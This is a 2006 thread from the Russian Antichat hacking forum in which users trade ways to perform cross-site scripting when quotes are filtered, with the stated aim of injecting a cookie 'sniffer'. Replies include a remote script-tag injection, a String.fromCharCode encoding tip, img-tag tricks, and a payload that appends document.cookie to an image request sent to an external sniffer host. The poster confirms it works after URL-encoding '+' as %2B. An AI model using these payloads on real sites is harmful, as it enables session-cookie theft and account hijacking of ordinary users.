Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Как можно произвести xss, если фильтруются кавычки? (https://forum.antichat.xyz/showthread.php?t=17945)

1ten0.0net1 20.04.2006 05:00

Как можно произвести xss, если фильтруются кавычки?
 
Скажите - как можно произвести xss, если фильтруются кавычки? Вариант с заменой на одинарные, %22 и на &/#22; , а также перенаправление на мой java-скрипт не предлагать. На серваке magic_quotes=on.

drmist 20.04.2006 10:42

Одинарный ковычки тоже фильтруютя?

Azazel 20.04.2006 11:01

Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>

А во вторых попробуй использовать String.fromCharCode
(encoder http://www.paulschou.com/tools/xlate/)

K[o]S 20.04.2006 11:14

Цитата:

Сообщение от Azazel
Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>

А во вторых попробуй использовать String.fromCharCode
(encoder http://www.paulschou.com/tools/xlate/)

Ковычки могут понадобиться для того чтоб закрыть тег =)

Автор поясни какого типа XSS актив пасив мыло форум и т.д

1ten0.0net1 20.04.2006 15:18

Цитата:

Сообщение от Azazel
Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>

Вариант со внедрением ява-скрипта не подходит, как я и написал выше.
Инъекция пассивная, одинарные фильтруются. Нужно внедрить адрес снифера. То, что знаю я - осуществляется через кавычки, поэтому прошу совета.

Xex 21.04.2006 01:46

а просто тыги можешь использовать?...
ну например картинку вставить?...
Код HTML:

<img src="тут твой код или адрес снифера">
а далее можешь проверить:
Код HTML:

<script>alert(document.images[0].src)</script>
Как дальше использовать думаю разберешься...

Laggi 21.04.2006 23:35

Гм, аналогичная ситуация - пассивный Xss, фильтруется только ", '... Что можно сделать нехорошего без кавычек? :-)
Т.е. просто картинку вставить могу - там кавычки не нужны, а вот с запросом О_о...

Laggi 21.04.2006 23:46

r=<img%20src=http://antichat.ru/cgi-bin/s.jpg?><script>img%20=%20new%20Image();%20img.src% 20=%20document.images[19].src+document.cookie;</script>
К примеру не подходит

Laggi 21.04.2006 23:49

А, все, доперло - "+" = " "... как от этого избавиться? :-) & нельзя использовать, сразу говорю.

В виде "%ХХ" как "+" выглядит?

UPD: усе, спасибо, нашел :-) %2B - все работает

Del 24.05.2006 13:23

так как запрос без кавычек выглядит?


Время: 00:23